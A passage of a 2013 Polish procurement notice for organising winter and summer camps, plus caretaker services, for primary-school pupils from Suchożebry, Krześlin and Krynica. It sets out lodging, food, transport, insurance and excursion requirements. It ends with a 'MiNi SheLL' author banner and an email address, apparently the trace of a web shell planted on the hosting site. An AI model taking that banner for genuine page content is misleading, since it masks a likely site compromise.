3) przewodników na wycieczkach, 4) dwa autokary, 5) bezpłatną opiekę medyczną: lekarsko -pielęgniarską, tj. pielęgniarka obecna w ośrodku 24 godziny na dobę , lekarz pierwszego kontaktu na gotowość 24 godziny na dobę , zakup lekarstw i materiałów opatrunkowych dla dzieci w trakcie trwania zimowiska w ramach kosztów Wykonawcy, 
6) opieka instruktorów narciarstwa w czasie nauki jazdy na nartach, 
7) obsługę sprzątająco - porządkową dla utrzymania czystości w całym obiekcie oraz w jego okolicy. 
L) Pozostałe wymagania: Wykonawca przedstawi: 1) pisemny program zimowiska na każdy dzień pobytu zapewniający właściwą organizację zajęć z dziećmi (zajęcia sportowe,  świetlicowe, wycieczki krajoznawcze, imprezy kulturalne itp.), 2) Przed zawarciem umowy wykonawca przedłoży propozycje wycieczek do wyboru Zamawiającego. Program wycieczek musi być przed zawarciem umowy uzgodniony z Zamawiającym i zaakceptowany przez niego. Wykonawca zapewnieni obsługę licencjonowanych przewodników na wycieczkach, pilota oraz bezpłatny wstęp dzieci do zwiedzanych w czasie wycieczek obiektów. 
Zamawiający wymaga w ramach programu zimowiska, realizacji następujących wycieczek autokarowych w czasie trwania zimowiska: 
2 wycieczki autokarowe po terenie Podhala powinny obejmować miejscowości atrakcyjne pod względem przyrodniczym i historycznym: 
- Podhale - Nowy Targ, Bukowina Tatrzańska (w tym min. 2h pobyt w basenach termalnych)
- Zakopane - Muzeum Tatrzańskie, Wielka Krokiew, Krupówki, Sanktuarium na Krzeptówkach, Gubałówka
- Ponadto w programie obozu powinno znaleźć się: spotkanie z muzykującą rodziną góralską, kulig zakończony pieczeniem kiełbasek przy ognisku, pobyt w Basenach Termalnych w Bukowinie Tatrzańskiej

3) Wykonawca przedstawi sprawozdanie merytoryczne z realizacji programu zimowiska w ciągu 14 dni od dnia jego zakończenia , 
4)Wykonawca zapewni artykuły (bloki, kredki, farby, długopisy, plastelina , modelina, wycinanki, nożyczki itp.) niezbędne do prowadzenia zajęć dla każdego uczestnika oraz dyplomy dla uczestników zimowiska za udział w konkursach i zabawach. Wykonawca będzie ściśle współpracował z kierownikiem projektu. Zamawiający zapewni dzienniki zajęć . 
Zamawiający zastrzega sobie prawo do obecności na zimowisku swojego reprezentanta w osobie kierownika projektu lub innego swojego przedstawiciela pełniącego nadzór nad realizacją programu wypoczynku zgodnie z umową, który ma prawo do: pobytu w ośrodku wypoczynkowym na koszt Wykonawcy, sprawdzania warunków socjalno-bytowych, pisemnego potwierdzenia wykonanych usług, stanowiącego podstawę do zapłaty faktury (dojazd/powrót razem z całą grupą na koszt Wykonawcy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 52.24.00.00-4, 63.50.00.00-4, 92.00.00.00-1, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Organizacja turnusu obozu letniego nad morzem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiotem zamówienia jest zorganizowanie obozu letniego w terminie od 01.08.2013r. - 10. 08. 2013 roku dla 80 uczniów Szkół Podstawowych w Suchożebrach,  Krześlinie i Krynicy w wieku od 10 do 13 lat oraz 8 opiekunów i  kierownika projektu, zgodnie z przepisami Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 218.1696) zmieniające rozporządzenie w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania.
 b) Miejsce pobytu, Polska: województwo pomorskie, okolice Trójmiasta (do 30 km)
A) Obiekt: 
1) w miejscowości nad morzem z dostępem max 600 m do plaży 
2) teren ośrodka powinien być usytuowany z dala od dróg o dużym natężeniu ruchu oraz od torów kolejowych, tj. w odległości nie mniejszej niż 500 m i musi być ogrodzony, oświetlony i strzeżony. Ośrodek, w którym będzie zorganizowany wypoczynek, musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno- sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. Organizator wypoczynku zapewnia możliwość korzystania z kąpieliska spełniającego wymogi bezpieczeństwa i czystości wody, opiekę ratowników podczas kąpieli a w przypadku deszczowej pogody lub niskich temperatur powietrza możliwość trzykrotnego skorzystania przez dzieci i opiekunów z krytego basenu przez czas 90 minut każdorazowo. Koszty wstępu na basen pokrywa Wykonawca.
Wykonawca zobowiązany jest do zapewnienia warunków bezpieczeństwa uczestników obozu, a w szczególności podczas kąpieli. Uwaga! Zamawiający nie wyraża zgody na zakwaterowanie uczestników w namiotach, domkach campingowych, pawilonach. 
3) zakwaterowanie dzieci, kadry wychowawców, kierownika projektu w jednym ośrodku 
(w rozumieniu przepisów ustawy Prawo budowlane), 
4) w pokojach dzieci maksymalnie 4 łóżka, z wyłączeniem łóżek piętrowych i tzw. dostawek, 5) pokoje z pełnym węzłem sanitarnym (natrysk, umywalka i wc) ze standardowym wyposażeniem: telewizor oraz szafka nocna przy każdym łóżku - tapczaniku, szafa z wieszakami i półkami, stół (stolik) i  krzesła w ilości odpowiadającej ilości dzieci w pokoju, 
6) pokoje i łazienki muszą być estetyczne i czyste, 
7) pokoje wychowawców i dzieci muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników kolonii na sąsiadujących kondygnacjach, na każdej z nich musi znajdować się pokój wychowawców, 
8) ciepła woda bez ograniczeń , 
9) na terenie ośrodka powinna znajdować się stołówka, 
10) na terenie ośrodka bądź w jego najbliższej okolicy powinien znajdować się ogólnie dostępny telefon na kartę magnetyczną lub chipową , 
11) ośrodek musi dysponować : a) salą dyskotekowa ze sprzętem dyskotekowym, b) świetlicą wyposażoną w stoliki i krzesła, gry planszowe, układanki itp, c) wokół obiektu teren sportowo - rekreacyjny, d) dysponować drobnym sprzętem sportowym (np.: piłki do gier zespołowych, sprzęt do badmingtona, stół z rakietkami do tenisa stołowego, itp.), e) izolatką , oddzielną dla dziewcząt i chłopców, f) salą przystosowaną do prowadzenia zajęć , g) pomieszczeniem do suszenia odzieży oraz sprzętem do prasowania 
12) Wykonawca zapewni nieodpłatną dostępność wymienionych w pkt 11 obiektów i sprzętów. Uwaga! Zamawiający przed podpisaniem umowy z wybranym wykonawcą zastrzega sobie prawo kontroli obiektu. Placówka zatwierdzona przez Kuratorium Oświaty - zgodnie z przepisami MEN. Na 14 dni przed przewozem uczestników Wykonawca zobowiązany jest do przedstawienia zaświadczenia wydanego przez Kuratora Oświaty właściwego dla miejsca zlokalizowania placówki wypoczynkowej o jej zarejestrowaniu 
B) Ilość i czas trwania turnusów: 1) wypoczynek dla dzieci ma być zorganizowany w formie jednego turnusu, 2) czas trwania turnusu od daty wyjazdu do daty przyjazdu- 10 dni, tj 10 dób (9 noclegów).
C) Liczba uczestników obozu letniego: Uczestnikami obozu letniego będą uczniowie Szkół Podstawowych w Suchożebrach,  Krześlinie i Krynicy w wieku 10 - 13 lat, ogółem 80 dzieci. Zamawiający we własnym zakresie zorganizuje nabór uczestników obozu. Lista uczestników przekazana będzie Wykonawcy zamówienia na 7 dni przed planowanym turnusem.  Opiekę nad uczestnikami obozu będzie sprawować 8 opiekunów. Zamawiający we własnym zakresie zorganizuje nabór wychowawców. Lista i informacja o dokumentach zostaną przekazane Wykonawcy na 3 tygodnie przed terminem obozu. Zamawiający zastrzega sobie prawo do obecności na obozie swojego reprezentanta w osobie kierownika projektu. 
D) Wymogi dotyczące wyżywienia: 
1) 4 (cztery) posiłki dziennie: śniadanie, obiad - składający się z dwóch ciepłych dań , podwieczorek i kolacja, 2)zapewnienie obiadów na trasie przejazdu ( tam i z powrotem) oraz suchego prowiantu na drogę powrotną z miejsca pobytu do Suchożebrów, Krześlina i Krynicy oraz podczas całodniowych wycieczek zaplanowanych w programie ramowym obozu, 3) dzieci muszą mieć stały dostęp do napoi - w stołówce lub na korytarzu przed stołówką Wykonawca udostępni przez całą dobę zimne napoje, kompot bądź herbatę, 4)posiłki winny być urozmaicone, odpowiadające normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, bogate w witaminy, owoce i warzywa, Niedopuszczalne jest podawanie posiłków w formie szwedzkiego stołu 5) turnus rozpoczyna się kolacją w pierwszym dniu pobytu (obiad na trasie dojazdu) i kończy się śniadaniem w ostatnim dniu pobytu (obiad na trasie powrotu). W czasie całodniowych wycieczek autokarowych dzieci otrzymują: śniadanie,  suchy prowiant na czas trwania wycieczki ( dwie bułki: z serem i wędliną, bułkę słodką, banana lub jabłko, batona, pół litra wody mineralnej niegazowanej, jeden soczek w kartoniku o pojemności 250 ml) a po powrocie tzw. obiadokolację czyli dwudaniowy obiad. 
E) Transport: 1) transport zapewnia Wykonawca, 2) transport autokarowy z klimatyzacją i WC na trasie: Szkoła Podstawowa w Suchożebrach, Krynicy, Krześlinie - obiekt wypoczynkowy, obiekt wypoczynkowy- Szkoła Podstawowa w Krześlinie, Krynicy, Suchożebrach 3) Wykonawca zapewnia obsługę autokarową na wycieczkach w czasie trwania kolonii, 4) dwa pojazdy muszą być sprawne z aktualnym przeglądem technicznym, obsługa dwóch   kierowców. Autokary muszą być wyposażone w dostateczną liczbę miejsc siedzących zgodnie z liczbą przewożonych uczestników, 5)dokładne godziny wyjazdu i powrotu autokarów ustalone zostaną w późniejszym okresie, 6). Zamawiający wyklucza przewóz dzieci autokarami w godzinach nocnych tzn. między godz. 22.00 a 6.00. 7) Koszty ubezpieczenia autokarów i dzieci podczas przejazdu pokrywa Wykonawca. 8) Zamawiający zastrzega sobie prawo powiadomienia Policji w celu kontroli pojazdów przed wyjazdem dzieci na obóz oraz przed powrotem z obozu 9) W przypadku awarii autokaru wykonawca zapewnia autokar zastępczy (o takim samym standardzie) na własny koszt. Do grupy podczas transportu nie może być dołączona inna grupa, 
F) Wykonawca zapewnia kierownika obozu letniego. Zadania Kierownika obozu obejmować będą przygotowanie i realizację turnusu wakacyjnego, nadzorowanie nauczycieli - wychowawców, kierowanie wypoczynkiem zgodnie z obowiązującymi przepisami; 
1) opracowywanie planu pracy oraz rozkładu dnia wypoczynku i kontrola ich realizacji; 
2) ustalenie i przydzielenie szczegółowego zakresu czynności poszczególnym opiekunom 
3) kontrola wykonywania obowiązków przez pracowników; 
4) zapewnienie uczestnikom wypoczynku właściwej opieki i warunków bezpieczeństwa od momentu przejęcia ich od rodziców (prawnych opiekunów) do czasu ponownego przekazania rodzicom (prawnym opiekunom); 
5) nadzorowanie zapewnienia odpowiednich warunków zdrowotnych i higieniczno-sanitarnych w miejscu wypoczynku, zgodnie z obowiązującymi przepisami w zakresie stanu sanitarnego pomieszczeń i otoczenia;
6) informowanie o zachowaniu dzieci i młodzieży oraz ich stanie zdrowia - na wniosek rodziców (prawnych opiekunów); 
7) zapewnienie zróżnicowanej diety uczestnikom wypoczynku; 
8) przechowywanie kopii dokumentów poświadczających kwalifikacje pracowników pedagogicznych przez okres trwania turnusu - łącznie dni (jeden dzień = 24 godz.) - 10 dni.
Osoba wykonująca zadania kierownika turnusu musi posiadać uprawnienia kierownika wypoczynku zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie musza spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ze zmianami wynikającymi z Rozporządzenia Ministra Edukacji Narodowej z dnia 9 grudnia 2009 r. (Dz.U. 2009 nr 218 poz. 1696). Osoba wykonująca zadania kierownika turnusu musi posiadać pełną zdolność do czynności prawnych i korzystać z praw publicznych; nie toczy się przeciwko niej postępowanie karne lub dyscyplinarne, lub postępowanie o ubezwłasnowolnienie; nie była karane za przestępstwo popełnione umyślnie; Na podstawie art.10 ust. 5 pkt 2, 3 i 4 oraz ust. 8 ustawy z dnia 26 stycznia 1982 r. - Karta Nauczyciela (Dz.U. z 2006 r. Nr 97, poz. 674 ze zm.)
G) Ubezpieczenie: 1)Wykonawca zapewnia ubezpieczenie uczestników i kadry od następstw nieszczęśliwych wypadków i kosztów leczenia, 2)ubezpieczenie obejmuje okres od momentu przekazania dzieci pod opiekę wychowawców z miejsca zbiórki tj: Szkoły Podstawowej w Suchożebrach, Krynicy i Krześlinie do momentu odebrania dzieci przez opiekunów/ rodziców przy Szkole Podstawowej w Krześlinie, Krynicy i Suchożebrach. 3)Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników obozu w trakcie podróży oraz podczas pobytu dzieci w ośrodku, 4)Wykonawca zobowiązany jest do posiadania ubezpieczenia OC. 
H) Wymagana jest obecność przedstawiciela Wykonawcy w dniu wyjazdu turnusu, 
I) Opieka: Na turnusie Wykonawca zapewnia: 1) kierownika obiektu, 2) pilota wycieczek, 
3) przewodników na wycieczkach, 4) dwa autokary, 5) bezpłatną opiekę medyczną: lekarsko -pielęgniarską, tj. pielęgniarka obecna w ośrodku 24 godziny na dobę , lekarz pierwszego kontaktu na gotowość 24 godziny na dobę , zakup lekarstw i materiałów opatrunkowych dla dzieci w trakcie trwania obozu w ramach kosztów Wykonawcy, 
6) opieka ratownika w czasie korzystania z kąpieliska morskiego i kapieli w basenie, 
7) obsługę sprzątająco - porządkową dla utrzymania czystości w całym obiekcie oraz w jego okolicy. 
J) Pozostałe wymagania: Wykonawca przedstawi: 
1) pisemny program obozu na każdy dzień pobytu zapewniający właściwą organizację zajęć z dziećmi (zajęcia sportowe,  świetlicowe, wycieczki krajoznawcze, imprezy kulturalne itp.), 
2) Przed zawarciem umowy wykonawca przedłoży propozycje wycieczek do wyboru Zamawiającego. Program wycieczek musi być przed zawarciem umowy uzgodniony z Zamawiającym i zaakceptowany przez niego. Wykonawca zapewni obsługę licencjonowanych przewodników na wycieczkach, pilota oraz bezpłatny wstęp dzieci do zwiedzanych w czasie wycieczek obiektów. 
Zamawiający wymaga w ramach turnusu realizacji następujących wycieczek autokarowych w czasie trwania obozu: 
3 wycieczki autokarowe po terenie Polski powinny obejmować miejscowości atrakcyjne pod względem przyrodniczym i historycznym: Gdańsk, Gdynię,  Oliwę, Sopot, Malbork, Frombork, a w szczególności:
Gdańsk -  Ratusz w Gdańsku, Długi Targ z Dworem Artusa, Fontanna Neptuna, Długie Pobrzeże, Żuraw
Gdynia - Oceanarium, ORP Błyskawica, Muzeum Marynarki Wojennej
Oliwa -  Ogród Botaniczny, koncert organowy w Katedrze Oliwskiej
Sopot- molo, monciak, Krzywy domek
Malbork -  Twierdza Krzyżacka
Frombork (rejs statkiem)- Muzeum Mikołaja Kopernika,  Planetarium
3) Wykonawca przedstawi sprawozdanie merytoryczne z realizacji programu obozu w ciągu 14 dni od dnia jego zakończenia, 
4)Wykonawca zapewni artykuły (bloki, kredki, farby, długopisy, plastelina , modelina, wycinanki, nożyczki itp.) niezbędne do prowadzenia zajęć dla każdego uczestnika) i dyplomy dla uczestników obozu letniego za udział w konkursach i zabawach. Wykonawca będzie ściśle współpracował z kierownikiem projektu. Zamawiający zapewni dzienniki zajęć . 
Zamawiający zastrzega sobie prawo do obecności podczas turnusu swojego reprezentanta w osobie kierownika projektu lub innego swojego przedstawiciela pełniącego nadzór nad realizacją programu wypoczynku zgodnie z umową, który ma prawo do: pobytu w ośrodku wypoczynkowym na koszt Wykonawcy, sprawdzania warunków socjalno-bytowych, pisemnego potwierdzenia wykonanych usług, stanowiącego podstawę do zapłaty faktury (dojazd/powrót razem z całą grupą na koszt Wykonawcy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 52.24.00.00-4, 63.50.00.00-4, 92.00.00.00-1, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Realizacja zajęć opiekuńczych podczas turnusu zimowego i letniego dla uczniów Szkół Podstawowych w Suchożebrach, Krynicy i Krześlinie w okresie: turnus zimowy 28.01.2013r. - 03.02.2013r. oraz turnus letni 01.08.2013r. - 10.08.2013r. Zajęcia będą obejmować jedną dziesięcioosobową grupę uczniów z klas IV-VI. Do zadań opiekuna-wychowawcy będzie należało: 1)zapoznanie się z kartami kwalifikacyjnymi uczestników wypoczynku; 2) opracowywanie planów pracy wychowawczej grupy; 3) prowadzenie dziennika zajęć ,4) organizowanie zajęć zgodnie z rozkładem dnia; 5)sprawowanie opieki nad uczestnikami grupy w zakresie higieny, zdrowia, wyżywienia oraz innych czynności opiekuńczych; 6) zapewnienie bezpieczeństwa uczestnikom grupy; 7) prowadzenie innych zajęć zleconych przez kierownika wypoczynku. 9) Zajęcia odbywać się będą: dla turnusu zimowego - 7 dni/ turnus dla grupy. Łącznie dni dla jednej grupy (jeden dzień = 24 godz.) - 7 dni; dla turnusu letniego -  10 dni/ turnus dla grupy. Łącznie dni dla jednej grupy (jeden dzień = 24 godz.) - 10 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wymaganiami jak dla CZ III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wymaganiami jak dla CZ III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część V I Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wymaganiami jak dla CZ III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wymaganiami jak dla CZ III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wymaganiami jak dla CZ III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wymaganiami jak dla CZ III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część X Realizacja zajęć opiekuńczych (wychowawcy grupy) podczas turnusu zimowego i letniego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z wymaganiami jak dla CZ III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com